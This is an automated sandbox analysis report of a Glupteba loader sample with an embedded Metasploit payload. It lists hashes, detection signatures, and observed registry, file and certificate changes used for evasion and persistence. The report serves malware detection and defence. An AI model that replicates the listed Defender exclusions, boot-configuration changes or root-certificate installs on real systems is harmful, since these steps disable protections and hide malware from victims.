glupteba | 2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7v20201028
submitted
04-03-2021 21:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

er.exe
Size

4.0MB
MD5

160dd398272fd4fdf51f410adad9a51b
SHA1

f49489e7960978dd7dbb1784b0c67b1fd540926d
SHA256

2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e
SHA512

8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence spyware trojan upx

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1648-6-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba
behavioral1/memory/1648-7-0x0000000004E80000-0x00000000056DD000-memory.dmp	family_glupteba
behavioral1/memory/1648-8-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba
behavioral1/memory/1584-24-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
816	bcdedit.exe
1248	bcdedit.exe
796	bcdedit.exe
680	bcdedit.exe
328	bcdedit.exe
604	bcdedit.exe
1212	bcdedit.exe
1492	bcdedit.exe
1344	bcdedit.exe
828	bcdedit.exe
1056	bcdedit.exe
1500	bcdedit.exe
1140	bcdedit.exe
796	bcdedit.exe

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exe

flow pid process

7 1164 rundll32.exe
9 1164 rundll32.exe
Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe

flow	pid	process
7	1164	rundll32.exe
9	1164	rundll32.exe

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Executes dropped EXE 15 IoCs

Processes:

csrss.exepatch.exedsefix.exewindefender.exewindefender.exeww31.exeupdateprofile-15.exeu20200626.exeupdateprofile-15.exeu20200626.exegetfp.exegetfp.exemg20201223-1.exeml20201223.exem672.exe

pid	process
1584	csrss.exe
1520	patch.exe
528	dsefix.exe
628	windefender.exe
1808	windefender.exe
904	ww31.exe
2020	updateprofile-15.exe
1900	u20200626.exe
1488	updateprofile-15.exe
796	u20200626.exe
1588	getfp.exe
2088	getfp.exe
2120	mg20201223-1.exe
2220	ml20201223.exe
2328	m672.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

UPX packed file 29 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windefender.exe	upx
behavioral1/memory/628-62-0x0000000000400000-0x0000000000897000-memory.dmp	upx
C:\Windows\windefender.exe	upx
C:\Windows\windefender.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe	upx
behavioral1/memory/2020-85-0x0000000000400000-0x0000000000C1C000-memory.dmp	upx
behavioral1/memory/1900-86-0x0000000000400000-0x0000000000C1B000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe	upx
behavioral1/memory/1488-92-0x0000000000400000-0x0000000000C1C000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\getfp.exe	upx
behavioral1/memory/796-95-0x0000000000400000-0x0000000000C1B000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\csrss\getfp.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe	upx
behavioral1/memory/1588-99-0x0000000000400000-0x00000000005E6000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\m672.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe	upx

Loads dropped DLL 30 IoCs

Processes:

er.exepatch.execsrss.exeupdateprofile-15.exeupdateprofile-15.exe

pid	process
692	er.exe
692	er.exe
880
1520	patch.exe
1520	patch.exe
1520	patch.exe
1520	patch.exe
1520	patch.exe
1520	patch.exe
1520	patch.exe
1520	patch.exe
1584	csrss.exe
1584	csrss.exe
1584	csrss.exe
1584	csrss.exe
1584	csrss.exe
1584	csrss.exe
2020	updateprofile-15.exe
2020	updateprofile-15.exe
2020	updateprofile-15.exe
1488	updateprofile-15.exe
1488	updateprofile-15.exe
1488	updateprofile-15.exe
1584	csrss.exe
1584	csrss.exe
1584	csrss.exe
1584	csrss.exe
1584	csrss.exe
1584	csrss.exe
1584	csrss.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

er.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	er.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	er.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	er.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	er.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	er.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	er.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\er.exe = "0"	er.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	er.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\SummerWater = "0"	er.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	er.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

er.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\SummerWater = "\"C:\\Windows\\rss\\csrss.exe\""	er.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\GameExplorer\{5DB02BE4-C29A-4813-9595-67091087F048}\PlayTasks\0\Play.lnk	rundll32.exe

Drops file in Windows directory 4 IoCs

Processes:

csrss.exeer.exe

description	ioc	process
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	er.exe
File created	C:\Windows\rss\csrss.exe	er.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1844 schtasks.exe
976 schtasks.exe

pid	process
1844	schtasks.exe
976	schtasks.exe

GoLang User-Agent 6 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	37	Go-http-client/1.1
HTTP User-Agent header	38	Go-http-client/1.1
HTTP User-Agent header	31	Go-http-client/1.1
HTTP User-Agent header	32	Go-http-client/1.1
HTTP User-Agent header	33	Go-http-client/1.1
HTTP User-Agent header	35	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

Processes:

windefender.exeer.execsrss.exenetsh.exerundll32.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	er.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-432 = "Iran Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	er.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-492 = "India Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-161 = "Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	er.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	er.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\Software\Microsoft	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	er.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	er.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time"	windefender.exe

Modifies registry class 3 IoCs

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\ServiceLocation	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\OOBGameInstalled = "1"	rundll32.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

csrss.exepatch.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
